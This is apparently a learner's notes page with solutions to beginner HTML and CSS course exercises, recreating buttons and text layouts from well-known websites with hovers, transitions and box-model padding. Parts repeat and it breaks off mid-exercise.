    font-size: 15px;
    font-weight: bold;
    padding: 12px 26px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    • 4f. Update the Tweet button to use padding instead of height/width
    • 4g. Use the Chrome DevTools to get the exact color for the Subscribe button and update it int the code
    <style>
    .subscribe-button {
    background-color: rgb(193, 0, 0);
    color: white;
    border: none;
    padding: 10px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: opacity 0.15s;
    vertical-align: top;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(6, 95, 212);
    border-style: solid;
    border-width: 1px;
    color: rgb(6, 95, 212);
    padding: 9px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(6, 95, 212);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    padding: 10px 16px;
    vertical-align: top;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png

    gif

    **Challenge Exercise **

    • 4h. Pagination
    <style>
    button{
    padding: 6px 2px;
    margin: 0px 5px;
    }
    a{
    margin: 0px 2px;
    }
    </style>
    <button>
    Back
    </button>
    <a href="https://www.youtube.com/">1</a>
    <a href="https://www.youtube.com/">2</a>
    <a href="https://www.youtube.com/">3</a>
    <a href="https://www.youtube.com/">4</a>
    <a href="https://www.youtube.com/">5</a>
    <button>
    Next
    </button>

    png

    • 4i. - 4k.
    <style>
    button{
    background-color: rgb(11, 136, 6);
    color: white;
    font-size: 15px;
    margin: 10px;
    vertical-align: top;
    border:none;
    padding: 6px 10px;
    }
    .stretch_button{
    transition: padding 1s;
    }
    .stretch_button:hover{
    padding: 12px 30px;
    }
    ._3d_click_button {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.4);
    }
    ._3d_click_button:active {
    margin-top: 15px;
    margin-left: 15px;
    box-shadow: none;
    }
    .margin_and_padding_together {
    transition: padding 0.3s,
    margin 0.3s;
    }
    .margin_and_padding_together:hover {
    margin-left: 5px;
    margin-right: 5px;
    padding-left: 15px;
    padding-right: 15px;
    }
    </style>
    <button class="stretch_button">Stretch</button>
    <button class="_3d_click_button">Shadow</button>
    <br/>
    <button class="margin_and_padding_together">One</button>
    <button class="margin_and_padding_together">Two</button>
    <button class="margin_and_padding_together">Three</button>

    png

    5. Text Styles

    • CSS Specificity: class name selector > element name selector

    • google 搜索 html entity greater than 得到 > 的 Entity Number &#62;

    <style>
    p {
    font-family: Arial;
    margin-top: 0;
    margin-bottom: 0;
    }
    .video-title {
    font-size: 18px;
    font-weight: bold;
    width: 280px;
    line-height: 24px;
    margin-bottom: 5px;
    }
    .video-stats {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-author {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-description {
    font-size: 14px;
    color:#606060;
    width: 280px;
    line-height: 20px;
    line-height: 22px;
    margin-top: 0;
    margin-bottom: 100px;
    }
    .apple-text {
    margin-bottom: 50px;
    font-size: 14px;
    background-color: #e34140;
    color: white;
    text-align: center;
    padding-top: 18px;
    padding-bottom: 18px;
    }
    .shop-link {
    margin-left: 5px;
    cursor: pointer;
    }
    .shop-link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="video-title">
    Talking Tech and AI with Google CEO Sundar Pichai!
    </p>

    <p class="video-stats">
    3.4M views &#183; 6month ago
    </p>

    <p class="video-author">
    Marques Brownlee &#10003;
    </p>

    <p class="video-description">
    Talking tech and AI on the heels of Google I/O.
    Also a daily driver phone reveal from Google's CEO.
    Shoutout to Sundar!
    </p>

    <p class="apple-text">
    Shop early for the best selection of holiday favourites.
    <span class="shop-link">Shop now &#62;</span>
    </p>

    png


    png

    • 5a. font = Tahoma
    <style>
    p {
    font-family: Tahoma;
    font-weight: bold;
    font-size: 24px;
    }
    </style>

    <p> This is Tahoma Font</p>

    png

    • 5b. font = Arial
    <style>
    p {
    font-family: Arial;
    }
    .title {
    font-weight: bold;
    font-size: 24px;
    margin: 0;
    }
    .introduce {
    color: red;
    font-style: italic;
    font-size: 16px;
    margin-top: 10px;
    }
    </style>

    <p class="title">Biggest Deals of the Year!</p>
    <p class="introduce">Sales end Tuesday</p>

    png

    • 5c. font = Verdana
    <style>
    p {
    font-family: Verdana;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin: 0;
    }
    .introduce {
    margin-top: 5px;
    color: #606060;
    }
    .decription {
    width: 300px;
    }
    .start_button {
    padding: 5px 12px;
    background-color: rgb(49, 126, 18);
    border: 0;
    border-radius: 5px;
    color: white;
    }
    </style>

    <p class="title">HTML CSS Course</p>
    <p class="introduce">Beginner to Pro</p>
    <p class="decription">
    In this course, we'll learn the skills
    you need to become a developer.
    </p>
    <button class="start_button">Get Started</button>

    png

    • 5d. font = Arial
    <style>
    p {
    font-family: Arial;
    }
    .title {
    text-align: center;
    font-weight: bold;
    font-size: 30px;
    margin-bottom: 0;
    }
    .introduce {
    margin-top: 14px;
    text-align: center;
    }
    .link {
    text-align: center;
    color:rgb(0, 147, 196);
    cursor: pointer;
    }
    .link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="title">Shopping for your business?</p>
    <p class="introduce">See how Apple at Work can help.</p>
    <p class="link">Learn more &#62;</p>

    png

    png

    **Challenge Exercise **

    • 5e.
    <style>
    p {
    text-align: center;
    font-family: Arial;
    margin: 0;
    }
    .new {
    font-weight: bold;
    color: orange;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin-top: 5px;
    }
    .decription {
    font-weight: bold;
    font-size: 35px;
    margin-top: 5px;
    }
    .price {
    margin-top: 10px;
    }
    .buy_button {
    margin-top: 10px;
    color:white;
    font-family: Arial;
    border:none;
    padding: 5px 12px;
    border-radius: 16px;
    background-color: rgb(29, 115, 207);
    }
    </style>

    <p class="new">New</p>
    <p class="title">MacBook Pro</p>
    <p class="decription">Supercharged for pros.</p>
    <p class="price">From $1999</p>
    <center><button class="buy_button">Buy</button></center>

    png

    • 5f.
    <style>
    p {
    font-family: Arial;
    margin-top: 6px;
    margin-bottom: 6px;
    }
    .current {
    font-size: 32px;
    }
    .usd {
    color: #606060;
    }
    .rise {
    color:green;
    }
    .after_hours {
    color: #606060;
    }
    .decline {
    color:rgb(208, 0, 0);
    }
    </style>
    <p>
    <span class="current">1049.61 </span>
    <span class="usd">USD</span>
    </p>
    <p class="rise">+18.05 (1.75%) today</p>
    <p>
    <span class="after_hours">After hours 1,048.00 </span>
    <span class="decline">-1.61 (0.15%)</span>
    </p>

    png

    • 5g.
    <style>
    p {
    font-family: Arial;
    margin-top: 8px;
    margin-bottom: 8px;
    }
    .title {
    font-weight: bold;
    }
    .author {
    color:#888;
    }
    .at {
    color:rgb(31, 169, 255);
    }
    .text {
    margin-top: 18px;
    }
    </style>
    <p>
    <span class="title">freeCodeCamp.org</span>
    <span class="author">@freeCodeCamp 1h</span>
    </p>
    <p>As a web developer, you'll want to make your projects easy to use and navigate around.</p>
    <p class="text">
    Here
    <span class="at">@chp_it</span>
    outlines the top skills new developers should have.
    </p>

    png

    ]]>
+ Resources

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

Course

    Intro

In this full course, we learn how to build websites with HTML and CSS and get started as software engineers.

Additional information: this HTML CSS full course is a series of HTML CSS tutorials teaching the major skills we need to create complex websites. Each tutorial builds on a project and provides HTML CSS exercises to practice what we learned. By the end, we'll know the basics of web development and be on our way to becoming web developers and software engineers.

    1. HTML Basics

    HTML: HyperText Markup Language (tool we use to create websites)


    png

    • 1a. Create a button with the text “Click” inside
    <button>Click</button>

• 1b. Create 2 buttons: one with your name and one with your favorite food
    <button>GZ</button>
    <button>dumplings</button>

    • 1c. Create a paragraph with the text “Hello, World!” inside
    <p>Hello, world!</p>


    • 1d. Create a paragraph below the previous paragraph and write something you did today
    <p>Hello, world!</p>
    <p>Today I got up early.</p>


    png

    • 1e. Create a link to google.com (or a similar website for your country)
    <a href="https://www.bilibili.com/">Open bilibili</a>


    • 1f. Make the link from the previous exercise (1e.) open in a new tab
    <a href="https://www.bilibili.com/" target="_">Open bilibili</a>


**Challenge Exercise**

    • 1g. Try to copy this design using HTML (the link goes to amazon.com)
    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p>Nike Black Running Shoes</p>
    <p>$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button>Add to Cart</button>
    <button>Buy now</button>



    2. CSS Basics

    CSS: Cascading Style Sheets (change the appearance of HTML elements)

YouTube & Tweet buttons

    <style>
    .subscribe-button {
    background-color: rgb(200, 0, 0);
    color: white;
    border: none;
    height: 36px;
    width: 105px;
    border-radius: 2px;
    cursor: pointer;
    margin-right: 8px;
    }

    .join-button {
    background-color: white;
    border-color: rgb(41, 118, 211);
    border-style: solid;
    border-width: 1px;
    color: rgb(41, 118, 211);
    height: 36px;
    width: 62px;
    border-radius: 2px;
    cursor: pointer;
    }

    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    height: 36px;
    width: 74px;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    png

    • 2a. Uber
    • 2b. Amazon
    • 2c. GitHub
    • 2d. Bootstrap
• 2e. LinkedIn
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    width: 105px;
    height: 36px;
    cursor: pointer;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    width: 160px;
    height: 36px;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    height:40px;
    width:95px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    height:40px;
    width:105px;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:105px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 250px;
    cursor: pointer;
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:75px;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    png

**Challenge Exercise**

• 2f. Continuing from exercise 1g., recreate this design using CSS:
    <style>
    .title{
    margin: 20px 0px;
    font-size: 25px;
    font-weight: bold;
    }
    .price{
    color:rgb(0, 118, 0);
    font-size: 18px;
    font-weight: bold;
    }
    .Amazon-button-1{
    background-color: rgb(255, 216, 20);
    border-radius: 20px;
    border: none;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    }
    .Amazon-button-2{
    background-color: rgb(255, 164, 28);
    border-radius: 20px;
    border: none;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    png

    3. Hovers, Transitions, Shadows

Note: declare the transition property on the base rule rather than inside :hover; otherwise the transition won't run when the pointer leaves the element.

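As a minimal sketch of that note (the class name here is illustrative, not from the course):

<style>
.fade-button {
  background-color: black;
  color: white;
  cursor: pointer;
  /* declared on the base rule, the transition plays on hover-in AND hover-out */
  transition: opacity 0.15s;
}
.fade-button:hover {
  opacity: 0.7; /* the hover rule only holds the target value */
}
</style>
<button class="fade-button">Hover me</button>

The full exercise below applies the same pattern to each button.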
    <style>
    .subscribe-button {
    background-color: rgb(200, 0, 0);
    color: white;
    border: none;
    height: 36px;
    width: 105px;
    border-radius: 2px;
    cursor: pointer;
    margin-right: 8px;
    transition: opacity 0.15s;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(41, 118, 211);
    border-style: solid;
    border-width: 1px;
    color: rgb(41, 118, 211);
    height: 36px;
    width: 62px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(41, 118, 211);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    height: 36px;
    width: 74px;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    gif

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    width: 105px;
    height: 36px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    width: 160px;
    height: 36px;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    height:40px;
    width:95px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    height:40px;
    width:105px;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:105px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
color: white;
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 250px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:75px;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

**Challenge Exercise**

    gif

    <style>
    a:hover {
    color:rgb(198, 96, 22);
    }
    .title{
    margin: 20px 0px;
    font-size: 25px;
    font-weight: bold;
    }
    .price{
    color:rgb(0, 118, 0);
    font-size: 18px;
    font-weight: bold;
    }
    .Amazon-button-1{
    background-color: rgb(255, 216, 20);
    border-radius: 20px;
    border: none;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Amazon-button-1:hover {
    background-color: rgb(240, 200, 16);
    }
    .Amazon-button-1:active {
    opacity: 0.5;
    }
    .Amazon-button-2{
    background-color: rgb(255, 164, 28);
    border-radius: 20px;
    border: none;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Amazon-button-2:hover {
    background-color: rgb(237, 120, 8);
    }
    .Amazon-button-2:active {
    opacity: 0.5;
    }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    4. Chrome DevTools & CSS Box Model

    CSS Box Model

• how much space an element takes up
• how far away it is from other elements (see the sketch below)
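
For reference, a minimal sketch (values are illustrative, assuming the default content-box sizing) of how the layers add up:

<style>
.box-demo {
  width: 200px;             /* content area */
  padding: 10px;            /* space between the content and the border */
  border: 2px solid black;  /* the border sits between padding and margin */
  margin: 15px;             /* space between this element and its neighbors */
  /* rendered width: 200 + 2*10 + 2*2 = 224px, plus 15px of margin per side */
}
</style>
<div class="box-demo">Box model demo</div>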

    gif

    • 4a. - 4e. Modify exercises 3a. - 3e. to use padding instead of height/width
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    padding: 8px 10px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    padding: 10px 26px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
color: white;
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    padding: 12px 26px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    • 4f. Update the Tweet button to use padding instead of height/width
• 4g. Use the Chrome DevTools to get the exact color for the Subscribe button and update it in the code
    <style>
    .subscribe-button {
    background-color: rgb(193, 0, 0);
    color: white;
    border: none;
    padding: 10px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: opacity 0.15s;
    vertical-align: top;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(6, 95, 212);
    border-style: solid;
    border-width: 1px;
    color: rgb(6, 95, 212);
    padding: 9px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(6, 95, 212);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    padding: 10px 16px;
    vertical-align: top;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png

    gif

**Challenge Exercise**

    • 4h. Pagination
    <style>
    button{
    padding: 6px 2px;
    margin: 0px 5px;
    }
    a{
    margin: 0px 2px;
    }
    </style>
    <button>
    Back
    </button>
    <a href="https://www.youtube.com/">1</a>
    <a href="https://www.youtube.com/">2</a>
    <a href="https://www.youtube.com/">3</a>
    <a href="https://www.youtube.com/">4</a>
    <a href="https://www.youtube.com/">5</a>
    <button>
    Next
    </button>

    png

    • 4i. - 4k.
    <style>
    button{
    background-color: rgb(11, 136, 6);
    color: white;
    font-size: 15px;
    margin: 10px;
    vertical-align: top;
    border:none;
    padding: 6px 10px;
    }
    .stretch_button{
    transition: padding 1s;
    }
    .stretch_button:hover{
    padding: 12px 30px;
    }
    ._3d_click_button {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.4);
    }
    ._3d_click_button:active {
    margin-top: 15px;
    margin-left: 15px;
    box-shadow: none;
    }
    .margin_and_padding_together {
    transition: padding 0.3s,
    margin 0.3s;
    }
    .margin_and_padding_together:hover {
    margin-left: 5px;
    margin-right: 5px;
    padding-left: 15px;
    padding-right: 15px;
    }
    </style>
    <button class="stretch_button">Stretch</button>
    <button class="_3d_click_button">Shadow</button>
    <br/>
    <button class="margin_and_padding_together">One</button>
    <button class="margin_and_padding_together">Two</button>
    <button class="margin_and_padding_together">Three</button>

    png

    5. Text Styles

    • CSS Specificity: class name selector > element name selector

• Googling "html entity greater than" turns up the entity number for >: &#62; (see the sketch below)
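
A minimal sketch of both notes (the class name is illustrative): the class selector wins over the element selector, and &#62; renders as >.

<style>
p { color: black; }         /* element selector: lower specificity */
.highlight { color: red; }  /* class selector: wins on the same element */
</style>
<p>This paragraph stays black.</p>
<p class="highlight">This one is red and ends with &#62;</p>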

    <style>
    p {
    font-family: Arial;
    margin-top: 0;
    margin-bottom: 0;
    }
    .video-title {
    font-size: 18px;
    font-weight: bold;
    width: 280px;
    line-height: 24px;
    margin-bottom: 5px;
    }
    .video-stats {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-author {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-description {
    font-size: 14px;
    color:#606060;
    width: 280px;
line-height: 22px;
    margin-top: 0;
    margin-bottom: 100px;
    }
    .apple-text {
    margin-bottom: 50px;
    font-size: 14px;
    background-color: #e34140;
    color: white;
    text-align: center;
    padding-top: 18px;
    padding-bottom: 18px;
    }
    .shop-link {
    margin-left: 5px;
    cursor: pointer;
    }
    .shop-link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="video-title">
    Talking Tech and AI with Google CEO Sundar Pichai!
    </p>

    <p class="video-stats">
3.4M views &#183; 6 months ago
    </p>

    <p class="video-author">
    Marques Brownlee &#10003;
    </p>

    <p class="video-description">
    Talking tech and AI on the heels of Google I/O.
    Also a daily driver phone reveal from Google's CEO.
    Shoutout to Sundar!
    </p>

    <p class="apple-text">
    Shop early for the best selection of holiday favourites.
    <span class="shop-link">Shop now &#62;</span>
    </p>

    png


    png

    • 5a. font = Tahoma
    <style>
    p {
    font-family: Tahoma;
    font-weight: bold;
    font-size: 24px;
    }
    </style>

<p>This is Tahoma Font</p>

    png

    • 5b. font = Arial
    <style>
    p {
    font-family: Arial;
    }
    .title {
    font-weight: bold;
    font-size: 24px;
    margin: 0;
    }
    .introduce {
    color: red;
    font-style: italic;
    font-size: 16px;
    margin-top: 10px;
    }
    </style>

    <p class="title">Biggest Deals of the Year!</p>
    <p class="introduce">Sales end Tuesday</p>

    png

    • 5c. font = Verdana
    <style>
    p {
    font-family: Verdana;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin: 0;
    }
    .introduce {
    margin-top: 5px;
    color: #606060;
    }
.description {
    width: 300px;
    }
    .start_button {
    padding: 5px 12px;
    background-color: rgb(49, 126, 18);
    border: 0;
    border-radius: 5px;
    color: white;
    }
    </style>

    <p class="title">HTML CSS Course</p>
    <p class="introduce">Beginner to Pro</p>
    <p class="decription">
    In this course, we'll learn the skills
    you need to become a developer.
    </p>
    <button class="start_button">Get Started</button>

    png

    • 5d. font = Arial
    <style>
    p {
    font-family: Arial;
    }
    .title {
    text-align: center;
    font-weight: bold;
    font-size: 30px;
    margin-bottom: 0;
    }
    .introduce {
    margin-top: 14px;
    text-align: center;
    }
    .link {
    text-align: center;
    color:rgb(0, 147, 196);
    cursor: pointer;
    }
    .link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="title">Shopping for your business?</p>
    <p class="introduce">See how Apple at Work can help.</p>
    <p class="link">Learn more &#62;</p>

    png

    png

**Challenge Exercise**

    • 5e.
    <style>
    p {
    text-align: center;
    font-family: Arial;
    margin: 0;
    }
    .new {
    font-weight: bold;
    color: orange;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin-top: 5px;
    }
.description {
    font-weight: bold;
    font-size: 35px;
    margin-top: 5px;
    }
    .price {
    margin-top: 10px;
    }
    .buy_button {
    margin-top: 10px;
    color:white;
    font-family: Arial;
    border:none;
    padding: 5px 12px;
    border-radius: 16px;
    background-color: rgb(29, 115, 207);
    }
    </style>

    <p class="new">New</p>
    <p class="title">MacBook Pro</p>
    <p class="decription">Supercharged for pros.</p>
    <p class="price">From $1999</p>
    <center><button class="buy_button">Buy</button></center>

    png

    • 5f.
    <style>
    p {
    font-family: Arial;
    margin-top: 6px;
    margin-bottom: 6px;
    }
    .current {
    font-size: 32px;
    }
    .usd {
    color: #606060;
    }
    .rise {
    color:green;
    }
    .after_hours {
